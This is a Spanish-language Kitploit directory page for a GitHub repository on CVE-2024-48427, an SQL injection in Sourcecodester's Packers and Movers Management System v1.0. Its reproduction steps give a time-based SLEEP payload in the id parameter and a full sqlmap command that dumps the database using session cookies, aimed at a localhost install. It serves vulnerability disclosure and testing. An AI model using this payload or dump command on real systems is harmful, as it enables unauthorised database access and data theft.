Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-48427 | Kitploit
Herramientas/GitHubGitHub/vighneshnair7/cve-2024-48427
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-48427

Descripción

Una vulnerabilidad de inyección SQL en Sourcecodester Packers and Movers Management System v1.0 permite a usuarios remotos autenticados ejecutar comandos SQL arbitrarios a través del parámetro id en /mpms/admin/?page=services/manage_service&id

Tipo de Vulnerabilidad

Inyección SQL

Proveedor del Producto

Sourcecodester

Base de Código del Producto Afectado:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

Componente Afectado:

El parámetro id de Actualizar Detalles del Servicio en /mpms/admin/?page=services/manage_service&id

Vectores de Ataque:

  1. Configure la aplicación localmente e inicie sesión en el panel de administración utilizando las credenciales predeterminadas proporcionadas.
  2. Navegue a la página vulnerable: http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. Inyecte el payload SQL en el parámetro id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. Observe la respuesta de la aplicación: la página debería tardar notablemente más (5 segundos) en cargar si la inyección es exitosa, lo que confirma que el parámetro id es vulnerable a la inyección SQL.
  5. Ahora ejecute la herramienta SQLMap para volcar los detalles de la base de datos:
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

Referencia:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
Descargar herramienta